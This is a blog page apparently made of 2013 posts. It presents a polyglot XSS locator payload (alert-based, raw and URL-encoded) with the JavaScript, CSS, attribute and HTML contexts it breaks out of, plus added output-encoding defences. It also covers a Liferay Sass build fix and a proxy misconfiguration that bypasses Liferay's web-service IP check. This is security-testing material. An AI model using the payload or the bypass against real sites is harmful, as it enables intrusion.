Thursday, December 5, 2013

My XSS Locator / Vector

toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'"+alert(/xss/)+"--></style><img src=x onerror=alert(/xss/)>*/}

URL Encoded:
toString()%2Balert(%2Fxss%2F)%2Bfunction()%7B%2F*%27%2Balert(%2Fxss%2F)%2B%27%22%2Balert(%2Fxss%2F)%2B%22--%3E%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%2Fxss%2F)%3E*%2F%7D


Pros
  • Fires in most injection contexts (the list is below)
  • Tries not to break JavaScript syntax
  • Easy to identify the vulnerable field (e.g. alert(/userMiddleName/))

Cons: too long for fields that have a length limit



List of exploitable places:
  • JavaScript/DOM XSS
    • var x="asdf<%= xssLocator %>xxx";
    • var y='asdf<%= xssLocator %>xxx';
    • opener.<%= xssLocator %>(some, arguments);
    • element.html(xssLocatorInput.value);
  • CSS XSS:
    • <style>a:after { content: '<%= xssLocator %>';}</style>
  • HTML Attribute XSS:
    • <a href="#" alt="<%= xssLocator %>">test</a>
    • <a href='#' alt='<%= xssLocator %>'>test</a>
  • HTML Body and Comments XSS
    • <%= xssLocator %>
    • <!-- <%= xssLocator %> -->
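The defensive counterpart to the list above, as an added example that is not code from the original post: one encoder per output context, applied to the locator itself, so that it stays inert in the JavaScript-string, CSS, attribute and body sinks listed. The encoder and helper names are this example's own, not Liferay's.

```javascript
// Added example, not code from the original post: context-aware output
// encoding that keeps the locator above from breaking out of each listed
// context. Encoder and helper names are this example's own, not Liferay's.
const XSS_LOCATOR = // constructed input: the locator from the post
  "toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'\"+alert(/xss/)+\"" +
  "--></style><img src=x onerror=alert(/xss/)>*/}";
// HTML body and attribute values: numeric-entity-encode every character
// that can open or close a tag, a comment or an attribute quote.
function encodeForHtml(s) {
  return s.replace(/[&<>"'\/]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// JavaScript string literal (either quote style): \uHHHH-escape everything
// outside [A-Za-z0-9], so quotes, comment markers and </script> cannot survive.
function encodeForJs(s) {
  return s.replace(/[^A-Za-z0-9]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// CSS string value: \HH<space>-escape everything outside [A-Za-z0-9],
// so neither the quote nor </style> can end the declaration.
function encodeForCss(s) {
  return s.replace(/[^A-Za-z0-9]/g,
    (c) => "\\" + c.charCodeAt(0).toString(16) + " ");
}

// Reverse the JS encoding to confirm the data is preserved, not mangled.
function decodeJs(s) {
  return s.replace(/\\u([0-9a-f]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Tokens the locator uses to leave its context; none may survive encoding.
const BREAKOUT = /[<>"']|\*\/|-->/;
function fragmentsAreInert(input) {
  return [encodeForHtml(input), encodeForJs(input), encodeForCss(input)]
    .every((f) => !BREAKOUT.test(f));
}

// Render the post's string-context sinks with the encoder matching each one.
// opener.X(...) and element.html(...) are not string contexts: encoding cannot
// make them safe, so untrusted input must not reach them at all.
function renderAll(input) {
  return {
    jsDouble: `var x="asdf${encodeForJs(input)}xxx";`,
    jsSingle: `var y='asdf${encodeForJs(input)}xxx';`,
    css: `<style>a:after { content: '${encodeForCss(input)}';}</style>`,
    attr: `<a href="#" alt="${encodeForHtml(input)}">test</a>`,
    body: encodeForHtml(input),
  };
}
```

Call `renderAll(XSS_LOCATOR)` to see each sink with the locator encoded in place; `decodeJs` is there only to show the JS encoding is lossless.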

Thursday, March 21, 2013

Liferay Theme & SASS cache problems during build

Extending themes using the Liferay Plugins SDK is simple.

Extending the Classic theme is not: the css/.sass-cache folder gets in your way, because the stale cached main.css is reused instead of being rebuilt.

How to fix it? Edit the build.xml file in your theme folder and override the build-css target:

<?xml version="1.0"?>
<!DOCTYPE project>

<project name="test-theme" basedir="." default="deploy">
  <import file="../build-common-theme.xml" />

  <property name="theme.parent" value="classic" />

  <!-- drop the stale cached CSS first, then run the SDK's normal build-css -->
  <target name="build-css">
    <delete file="docroot/css/.sass-cache/main.css" />
    <ant antfile="../build-common-theme.xml" target="build-css" />
  </target>
</project>


Tuesday, February 19, 2013

HTTP mod_proxy + Liferay @ same server = security problem

Liferay uses a remote-IP check to authorize access to its web services. With the wrong environment configuration this check can be bypassed.

The wrong configuration:
1. the web server runs on the same machine as the app server (same localhost / server IP)
2. the web server proxies requests over HTTP

What happens: the HTTP request goes to the web server, which proxies it to Liferay. The remote IP that Liferay sees is now the IP of the web server, i.e. localhost.

Risk
* Anyone can access the remote web services
* Anyone can execute public remote methods; other methods require authentication. (Note: starting with Liferay 6.1.1 / 6.1.20 all methods require authentication.)
* Anyone can brute-force users' portal credentials to break the authentication, and SSO settings are bypassed

Quick workaround: change
*.servlet.hosts.allowed=127.0.0.1,SERVER_IP
to
*.servlet.hosts.allowed=255.255.255.255

There is one drawback - you can't access Liferay Web Services from anywhere :)

Solution: move the web server to another machine, or use AJP:
* load mod_proxy_ajp
* rewrite the configuration to use ajp:// and port 8009 everywhere (8009 is Tomcat's default). Example:
ProxyPass / ajp://localhost:8009/

Applies to Apache HTTP Server, nginx and, in fact, to any HTTP proxy server in this configuration.